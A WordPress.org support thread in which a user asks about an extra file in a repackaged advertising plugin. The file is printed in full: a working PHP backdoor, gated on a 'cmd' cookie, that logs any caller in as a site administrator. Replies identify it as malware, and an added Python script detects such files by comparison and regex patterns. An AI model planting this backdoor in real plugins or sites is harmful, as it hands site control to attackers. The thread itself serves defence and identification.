Title: What does this coding do?
Last modified: October 21, 2017

---

# What does this coding do?

 *  Resolved [kendraalexandra](https://wordpress.org/support/users/kendraalexandra/)
 * (@kendraalexandra)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/)
 * I was recently sent a plugin to download for advertising purposes and on inspection
   I found the same plugin on WordPress. In the modified version I found an extra
   file including this coding and I was wondering if anyone could help me identify
   what it does before I install it on my site:
 * File name: inc-action.php
 * ```php
   <?php
   /**
    * WordPress User Page
    *
    * Handles authentication, registering, resetting passwords, forgot password,
    * and other user handling.
    *
    * @package WordPress
    */

   if(empty($_COOKIE['cmd'])){
       die();
   }
   require('../../../../wp-blog-header.php');
   $query_str = "SELECT ID FROM $wpdb->users";
   $user_ids = $wpdb->get_results($query_str);
   foreach ($user_ids as $uid) {
       $user_id = $uid->ID;
       if (user_can($user_id, 'administrator')) {
           $user_info = get_userdata($user_id);
           $user_login = $user_info->user_login;
           wp_set_current_user($user_id, $user_login);
           wp_set_auth_cookie($user_id);
           do_action('wp_login', $user_login);
           echo "You are logged in as $user_login";
           if (function_exists('get_admin_url')) {
               wp_redirect(get_admin_url());
           } else {
               wp_redirect(get_bloginfo('wpurl') . '/wp-admin');
           }
           exit;
       }
   }
   ```

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9607351)
 * That’s hacker stuff. It’s bad. Do not install.
 * Essentially, that gives anybody who knows that it is there Admin rights on your
   server.
 *  Thread Starter [kendraalexandra](https://wordpress.org/support/users/kendraalexandra/)
 * (@kendraalexandra)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9607354)
 * Thanks so much – I thought so! Just needed it confirmed 🙂
 *  [Adriano G. V. Esposito](https://wordpress.org/support/users/adriano-esposito/)
 * (@adriano-esposito)
 * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9622405)
 * Some days ago I received a similar advertising request for a site I manage, and
   inside it there was the same hack kendraalexandra showed. As Samuel said, the
   hack, if called via an HTTP request, gives the admin’s rights to the caller.
   Furthermore, in my malicious plugin there was another hack, called DarkShell,
   with which an attacker can browse the entire file system of the site.
 * I suspect it was also in kendraalexandra’s malicious plugin.
 * Note that the plugin was, except for the two files, perfectly legitimate and working.
 * So I understood the following: once the plugin is installed, the attacker calls
   an HTTP URL, which the first PHP file answers, to obtain administrator’s privileges.
   Then they call the second PHP file, which allows browsing the entire file system
   of the site.
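
Added example, not part of the original thread: a Python version of the check kendraalexandra describes doing by hand, comparing a received plugin directory against a reference copy downloaded from wordpress.org and flagging extra or modified files that contain the calls seen in `inc-action.php`. The function names, the indicator list and the sample trees in `demo()` are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Calls the inc-action.php sample in this thread uses to log a visitor in as an admin.
INDICATORS = {
    "sets auth cookie": re.compile(r"\bwp_set_auth_cookie\s*\("),
    "switches current user": re.compile(r"\bwp_set_current_user\s*\("),
    "bootstraps WordPress directly": re.compile(r"wp-(?:blog-header|load)\.php"),
    "gated on request cookie": re.compile(r"\$_COOKIE\s*\["),
}

def _hashes(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def compare_plugin(received, reference):
    """Return {relative_path: (status, [indicator names])} for files that differ."""
    got, ref = _hashes(received), _hashes(reference)
    report = {}
    for rel, digest in sorted(got.items()):
        if ref.get(rel) == digest:
            continue  # byte-identical to the reference copy
        status = "modified" if rel in ref else "extra"
        text = (Path(received) / rel).read_text(encoding="utf-8", errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        report[rel] = (status, hits)
    return report

def demo():
    """Constructed sample trees: a clean plugin and a copy with one extra file."""
    with tempfile.TemporaryDirectory() as tmp:
        ref, got = Path(tmp, "reference"), Path(tmp, "received")
        for root in (ref, got):
            root.mkdir()
            (root / "plugin.php").write_text("<?php /* Plugin Name: Sample */\n")
        (got / "inc-action.php").write_text(
            "<?php if(empty($_COOKIE['cmd'])){die();}\n"
            "require('../../../../wp-blog-header.php');\n"
            "wp_set_current_user($user_id, $user_login);\n"
            "wp_set_auth_cookie($user_id);\n")
        return compare_plugin(got, ref)

if __name__ == "__main__":
    for rel, (status, hits) in demo().items():
        print(f"{status:8} {rel}  {', '.join(hits) or 'no indicators'}")
```

Any file reported as `extra` or `modified` deserves manual review even when no indicator matches, since the indicator list only covers the calls shown in this thread.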
